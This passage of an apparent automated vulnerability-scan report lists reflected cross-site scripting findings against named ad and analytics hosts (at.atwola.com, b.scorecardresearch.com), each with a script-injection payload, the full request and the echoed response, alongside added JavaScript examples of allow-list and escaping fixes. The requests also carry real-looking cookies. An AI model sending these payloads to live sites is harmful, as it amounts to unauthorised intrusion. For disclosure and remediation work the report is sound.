Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304557020%2E283%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:57:18 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractionf7d49<script>alert(1)</script>573fa588bae("");
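
Both 5.36 and 5.39 reflect a caller-supplied callback name verbatim at the start of a script response. The following is an added example, not code from the report, AOL or comScore, of a JSONP responder that allow-lists the callback instead of echoing it; the function names, the regular expression and the 128-character cap are assumptions made for the example.

```javascript
// Added example (not code from the report, AOL or comScore): a JSONP
// responder that allow-lists the callback name instead of reflecting it.
// Function names, the regex and the length cap are assumptions.

// Sink as observed in findings 5.36 and 5.39: the raw parameter becomes
// the first bytes of the script body, whatever it contains.
function jsonpUnsafe(callback, payload) {
  return callback + '(' + JSON.stringify(payload) + ');';
}

// A legitimate callback is a dotted JavaScript member path such as
// "doGetToken.gotToken" or "COMSCORE.BMX.Broker.handleInteraction":
// identifier characters and single dots only, bounded in length.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;

function isValidCallback(name) {
  return typeof name === 'string' && name.length <= 128 && CALLBACK_RE.test(name);
}

// Hardened responder. Returns {status, headers, body} so it can be checked
// without a server. A rejected callback yields HTTP 400 (the report shows
// 200) and a fixed body that never contains the rejected value. The
// payload is server-generated data here; request-derived values placed
// inside it would additionally need script-safe escaping.
function jsonpSafe(callback, payload) {
  // nosniff is missing from both responses in the report; it stops
  // clients from rendering the script body as HTML.
  if (!isValidCallback(callback)) {
    const err = { response: { statusCode: 400, statusText: 'Invalid callback' } };
    return {
      status: 400,
      headers: { 'Content-Type': 'application/json; charset=UTF-8', 'X-Content-Type-Options': 'nosniff' },
      body: JSON.stringify(err),
    };
  }
  return {
    status: 200,
    headers: { 'Content-Type': 'application/javascript; charset=UTF-8', 'X-Content-Type-Options': 'nosniff' },
    body: callback + '(' + JSON.stringify(payload) + ');',
  };
}

// Payloads from findings 5.36 and 5.39, reused here as test input.
const REPORT_C_PAYLOAD = 'doGetToken.gotToken2c3af<script>alert(1)</script>07af1547688';
const REPORT_FUNC_PAYLOAD = 'COMSCORE.BMX.Broker.handleInteractionf7d49<script>alert(1)</script>573fa588bae';
```

A callback name is executed as code, so escaping cannot make it safe; only an allow-list can. The 400 branch returns a fixed body so that neither the scanner's reflection test nor a content-sniffing client has anything to find.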

5.40. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e9d8"><script>alert(1)</script>2b33d8fc33c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe1e9d8"><script>alert(1)</script>2b33d8fc33c/3.0/5113.1/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn1e9d8"><script>alert(1)</script>2b33d8fc33c/3.0/5113.1/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

5.41. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc88c"><script>alert(1)</script>11931b329c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0fc88c"><script>alert(1)</script>11931b329c4/5113.1/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0fc88c"><script>alert(1)</script>11931b329c4/5113.1/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

5.42. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68953"><script>alert(1)</script>6729eb7dd53 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.168953"><script>alert(1)</script>6729eb7dd53/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.168953"><script>alert(1)</script>6729eb7dd53/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

5.43. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc56b"><script>alert(1)</script>f3885e3ce75 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794cc56b"><script>alert(1)</script>f3885e3ce75/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794cc56b"><script>alert(1)</script>f3885e3ce75/0/-1/size=300x250;adiframe=y">
...[SNIP]...

5.44. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4aa31"><script>alert(1)</script>17fbae92a91 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/04aa31"><script>alert(1)</script>17fbae92a91/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/04aa31"><script>alert(1)</script>17fbae92a91/-1/size=300x250;adiframe=y">
...[SNIP]...

5.45. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9c97"><script>alert(1)</script>d52ab365ef1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1c9c97"><script>alert(1)</script>d52ab365ef1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1c9c97"><script>alert(1)</script>d52ab365ef1/size=300x250;adiframe=y">
...[SNIP]...

5.46. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b4de"><script>alert(1)</script>118786fa1f1 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size7b4de"><script>alert(1)</script>118786fa1f1=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size7b4de"><script>alert(1)</script>118786fa1f1=300x250;adiframe=y">
...[SNIP]...

5.47. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b2c3"><script>alert(1)</script>8a7aa19fc65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250?3b2c3"><script>alert(1)</script>8a7aa19fc65=1 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 232

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250?3b2c3"><script>alert(1)</script>8a7aa19fc65=1;adiframe=y">
...[SNIP]...

5.48. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [noperf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The payload 99c25"><script>alert(1)</script>e067740386f was placed at the end of the last path segment, after ;noperf=1;alias=, so the reflected text is the alias portion of that matrix-parameter list; the scanner labels the insertion point noperf, but the request shows the payload following alias= within the same segment. The value is copied into the src attribute of a <script> tag, which is encapsulated in double quotation marks, and echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response; it also shows that matrix parameters following the size segment are reflected in the same way as the path segments in 5.40 to 5.46.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=99c25"><script>alert(1)</script>e067740386f HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY5ODg6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA=; Axxd=1; AxData=1#50085|52841|50963|50507|50086; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 245

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=99c25"><script>alert(1)</script>e067740386f;adiframe=y">
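
Findings 5.40 to 5.48 all share one sink: the request path, its matrix parameters and any query name are copied raw into the double-quoted src attribute of a <script> tag in the adiframe wrapper page. The following is an added example, not code from the report or from at.atwola.com, that rebuilds that wrapper with a per-segment allow-list and attribute escaping; the function names, the allow-list, the 404/400 split and the placement of ;adiframe=y before the query string are assumptions made for the example.

```javascript
// Added example (not code from the report or from at.atwola.com): the
// adiframe wrapper page rebuilt so that path segments, matrix parameters
// and query names cannot break out of the script tag's src attribute.
// Function names, the allow-list and the 404/400 split are assumptions.

const HTML_PREFIX = '<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="';
const HTML_SUFFIX = '"></script></body></html>';

// Unsafe, as observed in the report: "/adiframe" is rewritten to "/addyn",
// the rest of the request target is appended verbatim, then ";adiframe=y".
function adiframeUnsafe(target) {
  const url = 'http://at.atwola.com/addyn' + target.replace(/^\/adiframe/, '') + ';adiframe=y';
  return { status: 200, body: HTML_PREFIX + url + HTML_SUFFIX };
}

// Characters the legitimate ad tags use in a path segment or a query
// pair: "3.0", "5113.1", "-1", "size=300x250", "noperf=1", "alias=foo".
// Quotes, angle brackets, '&', '/', '%', '#' and whitespace are excluded.
const TOKEN_RE = /^[A-Za-z0-9._=;-]+$/;

// Escape for a double-quoted HTML attribute value. With TOKEN_RE in force
// only the '&' between query pairs is ever rewritten, but keeping the step
// makes the markup safe even if the allow-list is later relaxed.
function escapeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: the first segment must be exactly "adiframe"; every further
// segment and every query pair must match TOKEN_RE; anything else gets a
// fixed error body that does not echo the request. ";adiframe=y" goes on
// the path, before the query (the original appends it after the query).
function adiframeSafe(target) {
  const q = target.indexOf('?');
  const path = q === -1 ? target : target.slice(0, q);
  const query = q === -1 ? '' : target.slice(q + 1);

  const segments = path.split('/').slice(1);            // drop the leading ''
  if (segments.shift() !== 'adiframe') return { status: 404, body: 'not found' };
  if (segments.length === 0 || !segments.every((s) => TOKEN_RE.test(s))) {
    return { status: 400, body: 'bad request' };
  }
  const pairs = query === '' ? [] : query.split('&');
  if (!pairs.every((p) => TOKEN_RE.test(p))) return { status: 400, body: 'bad request' };

  let url = 'http://at.atwola.com/addyn/' + segments.join('/') + ';adiframe=y';
  if (pairs.length > 0) url += '?' + pairs.join('&');
  return { status: 200, body: HTML_PREFIX + escapeAttr(url) + HTML_SUFFIX };
}

// Request targets from findings 5.40, 5.41, 5.47 and 5.48, reused as input.
const LEGIT_TARGET = '/adiframe/3.0/5113.1/221794/0/-1/size=300x250';
const P_SEG1 = '/adiframe1e9d8"><script>alert(1)</script>2b33d8fc33c/3.0/5113.1/221794/0/-1/size=300x250';
const P_SEG2 = '/adiframe/3.0fc88c"><script>alert(1)</script>11931b329c4/5113.1/221794/0/-1/size=300x250';
const P_QUERY = '/adiframe/3.0/5113.1/221794/0/-1/size=300x250?3b2c3"><script>alert(1)</script>8a7aa19fc65=1';
const P_ALIAS = '/adiframe/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=99c25"><script>alert(1)</script>e067740386f';
```

The allow-list does the real work: the ad server's own path grammar never needs quotes or angle brackets, so rejecting them loses nothing. escapeAttr is kept as the second, independent layer so that the attribute boundary holds even if someone later widens TOKEN_RE.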
...[SNIP]...

5.49. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into a double-quoted JavaScript string literal in the COMSCORE.beacon({...}) call at the end of the script, which is served as application/x-javascript. The payload d2060<script>alert(1)</script>a92a3305e16 was submitted in the c1 parameter and echoed without encoding.

Inside a string literal a <script> tag is inert, so this test establishes that < and > are not encoded, not that script runs when beacon.js is loaded as a script. The breakout that would give JavaScript injection in that context is an unescaped double quote or backslash, which this request does not exercise and which should be checked by hand. Rendering the body as HTML, where the reflected tag does execute, requires a client that content-sniffs the response; no X-Content-Type-Options: nosniff header is sent.

Request

GET /beacon.js?c1=8d2060<script>alert(1)</script>a92a3305e16&c2=2113&c3=20&c4=4837&c5=34872&c6=&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8d2060<script>alert(1)</script>a92a3305e16", c2:"2113", c3:"20", c4:"4837", c5:"34872", c6:"", c10:"205196", c15:"", c16:"", r:""});
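
Findings 5.49 to 5.54 show the same sink for c1, c2, c3, c4, c10 and c15: each value lands between double quotes inside the COMSCORE.beacon({...}) trailer with no escaping. The following is an added example, not code from the report or from comScore, that rebuilds that trailer so values cannot leave their string literals and shows, with the report's own c1 payload, the difference between an inert tag inside a literal and a quote that escapes it; the function names and the fixed field list are assumptions made for the example.

```javascript
// Added example (not code from the report or from comScore): the
// beacon.js trailer rebuilt so request values cannot leave their string
// literals. Function names and the field list are assumptions.

// Sink as observed in the report: each value is dropped between quotes
// with no escaping at all. A '"' in any value ends the literal; '<' and
// '>' pass through to any client that sniffs the response as HTML.
function beaconTrailerUnsafe(params) {
  const fields = Object.keys(params).map((k) => k + ':"' + params[k] + '"');
  return 'COMSCORE.beacon({' + fields.join(', ') + '});';
}

// JSON.stringify escapes '"', '\\' and control characters. The extra
// replace covers what JSON leaves raw but which matters in a script
// body: '<' and '>' (so "</script>" can never appear literally) and
// U+2028/U+2029 (line terminators in pre-ES2019 JavaScript).
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>\u2028\u2029]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Only the fields the beacon knows are emitted, in a fixed order; unknown
// query names (a separate reflection vector elsewhere in this report)
// are dropped rather than echoed.
const BEACON_FIELDS = ['c1', 'c2', 'c3', 'c4', 'c5', 'c6', 'c10', 'c15', 'c16', 'r'];

function beaconTrailerSafe(params) {
  const fields = BEACON_FIELDS.map((k) =>
    k + ':' + jsStringLiteral(params[k] === undefined ? '' : params[k]));
  return 'COMSCORE.beacon({' + fields.join(', ') + '});';
}

// Round-trip check: run a trailer against a stub COMSCORE.beacon and
// return the object it received. The safe trailer must hand back exactly
// the input values; with the unsafe one an injected quote changes the
// object (or makes the script fail to parse).
function evaluateTrailer(trailer) {
  let received = null;
  const stub = { beacon: (o) => { received = o; } };
  new Function('COMSCORE', trailer)(stub);
  return received;
}

// The c1 payload from finding 5.49, reused here as test input.
const REPORT_C1 = '8d2060<script>alert(1)</script>a92a3305e16';
```

Running the report's payload through evaluateTrailer(beaconTrailerUnsafe(...)) returns c1 unchanged: the tag is data inside the literal. Feeding a value that starts with a double quote to the unsafe trailer adds a property the caller never sent, which is the breakout the canned issue text does not test; the safe trailer returns the quote as part of c1 and nothing else.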



5.50. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into a double-quoted JavaScript string literal in the COMSCORE.beacon({...}) call at the end of the script, which is served as application/x-javascript. The payload 915f9<script>alert(1)</script>521310be6bf was submitted in the c10 parameter and echoed without encoding.

As for the c1 parameter in 5.49: the tag is inert inside a string literal, so this shows missing encoding of < and >; an unescaped double quote or backslash is the breakout to test by hand for injection into the script itself, and the tag only renders as HTML in a content-sniffing client, since no X-Content-Type-Options: nosniff header is sent.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=34872&c6=&c10=205196915f9<script>alert(1)</script>521310be6bf&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
